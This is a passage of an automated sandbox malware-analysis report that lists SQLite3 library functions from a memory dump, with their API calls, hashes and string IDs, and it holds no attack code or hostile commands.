                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4BFF1
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4BFFC
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E4C0B5
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E4C0C0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID:
                                              • API String ID: 1477753154-0
                                              • Opcode ID: 8b5bb90a8d8e3fcfe308889df330a62c9d169bbf9336247add8eef0d3be30423
                                              • Instruction ID: 6cd43e308ddd8e4b2453f558f1529e7bed2a9174b9ce8acad1653265291db371
                                              • Opcode Fuzzy Hash: 8b5bb90a8d8e3fcfe308889df330a62c9d169bbf9336247add8eef0d3be30423
                                              • Instruction Fuzzy Hash: 85216B70B087418BD704AF68D480B1ABBF0EF86358F24C42DE8888B345D7B5E895CB96
                                              Function 61E2FB41 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_initialize.SQLITE3 ref: 61E2FB4F
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E2FB6B
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E2FB8D
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E2FBFF
                                              • sqlite3_memory_used.SQLITE3 ref: 61E2FC04
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_mutex_leave$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_enter
                                              • String ID:
                                              • API String ID: 3898154609-0
                                              • Opcode ID: 61c2e13c5b89f008d4b621337c367384390f7a0df64eeb94ec49534c1ea663ee
                                              • Instruction ID: f8106396dd1b7cd0d3d46985ea6c1336ded98f8d55699ad5661a9d3e24a96c48
                                              • Opcode Fuzzy Hash: 61c2e13c5b89f008d4b621337c367384390f7a0df64eeb94ec49534c1ea663ee
                                              • Instruction Fuzzy Hash: 10217F31B15A478BCF049EF9C5B465D77A6BFDA318B24C629E866CB340D634EC818B81
                                              Function 61E30E6B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 343COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E092D1: memcmp.MSVCRT ref: 61E0932B
                                              • sqlite3_free.SQLITE3 ref: 61E3108B
                                              • sqlite3_log.SQLITE3 ref: 61E3110C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: memcmpsqlite3_freesqlite3_log
                                              • String ID:
                                              • API String ID: 4004471993-3916222277
                                              • Opcode ID: f0087b9df143b8349bf224c3b7d26579bd045dd0529595e307f74d4d186bcbeb
                                              • Instruction ID: 794968cd137a92c2aa3c93cbd1452fcd34db72ed53713c120eed5ba5ec83e385
                                              • Opcode Fuzzy Hash: f0087b9df143b8349bf224c3b7d26579bd045dd0529595e307f74d4d186bcbeb
                                              • Instruction Fuzzy Hash: 9CE11370E04269CBEB54CFA9C88079DBBF1AF88308F25816DD858AB396D774D885CF41
                                              Function 61E1D057 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 227COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_str_append.SQLITE3 ref: 61E1D0D3
                                              • sqlite3_str_append.SQLITE3 ref: 61E1D107
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_str_append
                                              • String ID: $,
                                              • API String ID: 1074250351-71045815
                                              • Opcode ID: 72bf5c925d8a099338cdd9b3a5b7ad29b61a0a1f2269b43d119149c0f07abe4b
                                              • Instruction ID: f1d7352beec9d90e664a2fafb21961481412e418c05b673b7e458f42def8eddb
                                              • Opcode Fuzzy Hash: 72bf5c925d8a099338cdd9b3a5b7ad29b61a0a1f2269b43d119149c0f07abe4b
                                              • Instruction Fuzzy Hash: E5A1963890C7958EEB218E58888A39DBFF1BB07318F24C5D5D4A89B259C374CAC5CF52
                                              Function 61E3E9AC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 155COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_mprintf.SQLITE3 ref: 61E3EB5C
                                              • sqlite3_free.SQLITE3 ref: 61E3EB88
                                                • Part of subcall function 61E3E952: sqlite3_vmprintf.SQLITE3 ref: 61E3E96B
                                                • Part of subcall function 61E3E952: sqlite3_mprintf.SQLITE3 ref: 61E3E989
                                                • Part of subcall function 61E3E952: sqlite3_free.SQLITE3 ref: 61E3E995
                                                • Part of subcall function 61E3E952: sqlite3_free.SQLITE3 ref: 61E3E99D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                              • String ID: AND$NOT
                                              • API String ID: 966554101-2843896482
                                              • Opcode ID: de8ad1ea1a8046caec5709d79432e0f6c73b39c37691e3d6f0486e3950a41084
                                              • Instruction ID: c677c27800f571b628751464df11e04e16ebb191523a6ce42430961256406383
                                              • Opcode Fuzzy Hash: de8ad1ea1a8046caec5709d79432e0f6c73b39c37691e3d6f0486e3950a41084
                                              • Instruction Fuzzy Hash: A551F770A08B629BD7559FAAC19122EBBF1BBC5344F34C86DD49A9B340D734DC42CB52
                                              Function 61E2F40D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 131COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_log
                                              • String ID: `a$`a
                                              • API String ID: 632333372-4011325876
                                              • Opcode ID: 6bf3a06c3af4a11ec66c67f90b85e1e24535496829d6509e33d8ded0de7ba1cb
                                              • Instruction ID: fa4ab9a93c53e5615ca93556c57ba02bcb13087f55050fefc76a8895a68f73c2
                                              • Opcode Fuzzy Hash: 6bf3a06c3af4a11ec66c67f90b85e1e24535496829d6509e33d8ded0de7ba1cb
                                              • Instruction Fuzzy Hash: 3C51EC74699E85EBDB14CE1AC0A064977E0F74A311F28C81BED578B344E678DD82CB62
                                              Function 61E2EBE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_free$sqlite3_win32_is_nt
                                              • String ID: winAccess
                                              • API String ID: 2284118020-3605117275
                                              • Opcode ID: 58d04f85f7a6ec938cb1ad35610cdf0be7c22aabb524b6681093dd721ea69170
                                              • Instruction ID: ed409991cb63effa397f6f5cae3af3827c91df8d0dda700269291762d6c8a76e
                                              • Opcode Fuzzy Hash: 58d04f85f7a6ec938cb1ad35610cdf0be7c22aabb524b6681093dd721ea69170
                                              • Instruction Fuzzy Hash: 38317031904AA9CFEB049FFAC56575EB7B1EB84328F35C629D86497380D774D842C781
                                              Function 61E66D53 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 87COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3$d
                                              • API String ID: 0-1650181692
                                              • Opcode ID: 604da744cb065788d9da2fa49b8129a91a2ff371f32a915e587f025c604c07df
                                              • Instruction ID: 5e1c1419ca462676cd3bb4643691dc0c44af26fb9bc2b4caad84258ee2829fb7
                                              • Opcode Fuzzy Hash: 604da744cb065788d9da2fa49b8129a91a2ff371f32a915e587f025c604c07df
                                              • Instruction Fuzzy Hash: AB315A74A04358DFDB10DF28C484B89BBF4FB09328F5485A9E8988B311C330EA84CF81
                                              Function 61E15163 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_value_int$sqlite3_result_blob
                                              • String ID: $
                                              • API String ID: 2918918774-3993045852
                                              • Opcode ID: 18ea121b7dc20f56fb2ee3b8f085ccc7c1541fc414bc93043438b73d54360f93
                                              • Instruction ID: c245250199bb8dce973d6009669313178de410e5e4128b0f7b4b28d432593734
                                              • Opcode Fuzzy Hash: 18ea121b7dc20f56fb2ee3b8f085ccc7c1541fc414bc93043438b73d54360f93
                                              • Instruction Fuzzy Hash: 8021D4B5E0464A9FCB40DFA9D480A89BBF4FF48214F14852AE858DB750E335E961CFA1
                                              Function 61E33F05 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_malloc.SQLITE3 ref: 61E33F23
                                                • Part of subcall function 61E2FCC8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E2F7C6), ref: 61E2FCD0
                                              • sqlite3_realloc.SQLITE3 ref: 61E33F71
                                              • sqlite3_free.SQLITE3 ref: 61E33F87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                              • String ID: d
                                              • API String ID: 211589378-2564639436
                                              • Opcode ID: 9d0dcaf4982cfa755cdae5e0dd3bd6bc122f1d01ed342ae6350eac93378b7e56
                                              • Instruction ID: 18ab0f402378f7e5c6a227e0ca0527dbc6652d96893f5a21e124434f51e858ee
                                              • Opcode Fuzzy Hash: 9d0dcaf4982cfa755cdae5e0dd3bd6bc122f1d01ed342ae6350eac93378b7e56
                                              • Instruction Fuzzy Hash: 8E2116B1A00215CFDB00CF69C4C0A9ABBF0FF89310F188469D9889B315D338E885CFA1
                                              Function 61E22C50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 61E22B44: sqlite3_log.SQLITE3(?,?,?,?,?,61E22BF7), ref: 61E22B7F
                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E22C83
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E22CBE
                                                • Part of subcall function 61E22948: sqlite3_log.SQLITE3 ref: 61E22971
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID: out of memory
                                              • API String ID: 2575432037-2599737071
                                              • Opcode ID: f378f8a2cd98380602ebb4e8012ced2dac04e3fee7c55749d91a86f4ad95b5b9
                                              • Instruction ID: 9bd5c1d702670e6cc435a6760f0fe60040a91e367a8db857989dc8046259e734
                                              • Opcode Fuzzy Hash: f378f8a2cd98380602ebb4e8012ced2dac04e3fee7c55749d91a86f4ad95b5b9
                                              • Instruction Fuzzy Hash: 63018FB0A182428BDB089FF9C8D16197BF4AB65358F28C4BAEC458F309E735D890CB51
                                              Function 61E2F9E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                              Download Yara Rule
                                              APIs
                                              • sqlite3_initialize.SQLITE3(?,?,61E2FA80), ref: 61E2F9F3
                                              • sqlite3_mutex_enter.SQLITE3(?,?,61E2FA80), ref: 61E2FA0B
                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E2FA3D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                              • String ID: @a
                                              • API String ID: 2249238807-2438778631
                                              • Opcode ID: 63101c189bf0478709ad929a1896cceee51d7031faa66621e90afd04cfafddca
                                              • Instruction ID: 4c684e0a207082bbd07e54aa5de67b95383de8e6be8c26165238607a0e91135a
                                              • Opcode Fuzzy Hash: 63101c189bf0478709ad929a1896cceee51d7031faa66621e90afd04cfafddca
                                              • Instruction Fuzzy Hash: 1AF01D70A146128BDB40AFAA8994605B7F4EF4626CF68C56DD80C8F301E738D8528F91
                                              Function 61E2DC91 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSection.KERNEL32 ref: 61E2DCBD
                                              • sqlite3_win32_sleep.SQLITE3 ref: 61E2DCE4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: CriticalInitializeSectionsqlite3_win32_sleep
                                              • String ID: 0a$a
                                              • API String ID: 3721583994-871096936
                                              • Opcode ID: 8d24fe1d5417259fa4805cd51f5199bc3559624c9b3aded0188f712b94116964
                                              • Instruction ID: b3706c496ad70abc1ca9369ee0a2b2f4fc7e3bb09ea8c560dc3951050284011f
                                              • Opcode Fuzzy Hash: 8d24fe1d5417259fa4805cd51f5199bc3559624c9b3aded0188f712b94116964
                                              • Instruction Fuzzy Hash: 2FF082B451A6068AEB095BA48D5274A76A8FF09358F208439CB444B300D3B5E08187D2
                                              Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640131682.0000000061EB2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640136887.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640143152.0000000061EB6000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640149377.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640154382.0000000061EBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_61e00000_gpupdate.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                              • API String ID: 1646373207-328863460
                                              • Opcode ID: 450cc2d9d87279b87717c0d9f2350a5f332e03025d4b7e3ad0b45521ac22a8b9
                                              • Instruction ID: 7bfdb8154b53b4a91d9734cdd65c9022ba8d45337d44c10a6794e2ab9ffc6c10
                                              • Opcode Fuzzy Hash: 450cc2d9d87279b87717c0d9f2350a5f332e03025d4b7e3ad0b45521ac22a8b9
                                              • Instruction Fuzzy Hash: 92E0E5B4514B415BF7046FE5850632D7EB9AF85709F62C81CD5C456254E634C491C763
                                              Function 61E35ABA Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 293stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.640105555.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                              • Associated: 00000005.00000002.640100379.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640119396.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                              • Associated: 00000005.00000002.640124729.0000000061E9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
